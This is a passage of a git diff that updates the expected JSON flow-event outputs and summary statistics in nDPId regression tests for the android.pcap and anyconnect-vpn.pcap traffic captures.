{"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1582454868527,"flow_last_seen":1582454869366,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4841,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867323,"flow_last_seen":1582454867358,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.35.8","src_port":45863,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871881,"flow_last_seen":1582454871920,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871343,"flow_last_seen":1582454871383,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867244,"flow_last_seen":1582454867284,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454872021,"flow_last_seen":1582454872022,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869626,"flow_last_seen":1582454870649,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} 
00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869626,"flow_last_seen":1582454870649,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866803,"flow_last_seen":1582454871058,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866803,"flow_last_seen":1582454866894,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
-00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871553,"flow_last_seen":1582454871667,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871829,"flow_last_seen":1582454872026,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} +00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866803,"flow_last_seen":1582454871058,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866803,"flow_last_seen":1582454866894,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871553,"flow_last_seen":1582454871667,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} 
+00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871829,"flow_last_seen":1582454872026,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} 00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871292,"flow_last_seen":1582454871294,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454871103,"flow_last_seen":1582454871450,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5661,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1582454871814,"flow_last_seen":1582454872019,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":3276,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} -00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871061,"flow_last_seen":1582454871100,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871600,"flow_last_seen":1582454871601,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867723,"flow_last_seen":1582454867761,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} -00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","packets-captured":500,"packets-processed":475,"total-skipped-flows":0,"total-l4-payload-len":101980,"total-not-detected-flows":0,"total-guessed-flows":3,"total-detected-flows":60,"total-detection-updates":42,"total-updates":0,"current-active-flows":0,"total-active-flows":63,"total-idle-flows":63,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":381,"global_ts_msec":1582454872047} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871292,"flow_last_seen":1582454871294,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454871103,"flow_last_seen":1582454871450,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5661,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} +00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1582454871814,"flow_last_seen":1582454872019,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":3276,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} +00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871061,"flow_last_seen":1582454871100,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871600,"flow_last_seen":1582454871601,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867723,"flow_last_seen":1582454867761,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} 
+00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","packets-captured":500,"packets-processed":475,"total-skipped-flows":0,"total-l4-payload-len":101980,"total-not-detected-flows":0,"total-guessed-flows":3,"total-detected-flows":60,"total-detection-updates":43,"total-updates":0,"current-active-flows":0,"total-active-flows":63,"total-idle-flows":63,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":382,"global_ts_msec":1582454872047} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 500/475 ~~ skipped flows.............: 0 @@ -387,9 +388,9 @@ ~~ total active/idle flows...: 63/63 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6109004 bytes -~~ total memory freed........: 6109004 bytes -~~ total allocations/frees...: 119080/119080 +~~ total memory allocated....: 6240347 bytes +~~ total memory freed........: 6240347 bytes +~~ total allocations/frees...: 121841/121841 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 2361 chars diff --git a/test/results/anyconnect-vpn.pcap.out b/test/results/anyconnect-vpn.pcap.out index 4f2047ac8..9984eac4a 100644 --- a/test/results/anyconnect-vpn.pcap.out +++ b/test/results/anyconnect-vpn.pcap.out 
@@ -8,92 +8,92 @@ 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569687241064,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687241064,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/9D4wAAAgQFtAEDAwUBAQgKHA1prQAAAAAEAgAA"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241422,"flow_last_seen":1569687241422,"flow_idle_time":7580000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":1,"thread_ts_msec":1569687241422,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569687241422,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":176,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":176,"pkt_l4_len":142,"thread_ts_msec":1569687241422,"pkt":"pHczjPFANDY7z3UoCABFAgCiAABAAEAGJN0KAADjCgAAldwAH0m4VKQ8auVpuYAYEABwEgAAAQEIChwNaxEAIdNWFwMDAGnlEQRtW5ojm6mWGmuJ194WM1mCL2bpF6lVRy8fAR1ACLW+\/3MKXobzfgt7ehMx+gNqTDxT8XKtVt5pIDD++LOG\/\/cqs3TN3c3wAeYVwc4BceqqH837rqaW0xgZLYui1J36mDCwUeIDu0c="} 
-00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241422,"flow_last_seen":1569687241422,"flow_idle_time":7580000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":1,"thread_ts_msec":1569687241422,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241422,"flow_last_seen":1569687241422,"flow_idle_time":7580000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":1,"thread_ts_msec":1569687241422,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1569687241425,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":176,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":176,"pkt_l4_len":142,"thread_ts_msec":1569687241425,"pkt":"NDY7z3UopHczjPFACABFAgCiFAFAAEAGENwKAACVCgAA4x9J3ABq5Wm5uFSkqoAYARVOTgAAAQEICgAh1UocDWsRFwMDAGlPAxZ+sivF5tip\/a4L1+WZBjanPy6dIIBwPewIOXwBBC++JWdD5zwUQ1UFmtf+v81kwZap7Lx2\/Gcfr+ckh4zK2QCeLZSVHkvGQHTulBE1960y\/ZxOXKVM8M0GvGzhWev1+K8IvZbQRCI="} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569687241425,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687241425,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAldwAH0m4VKSqauVqJ4AQD\/zHZwAAAQEIChwNaxMAIdVK"} 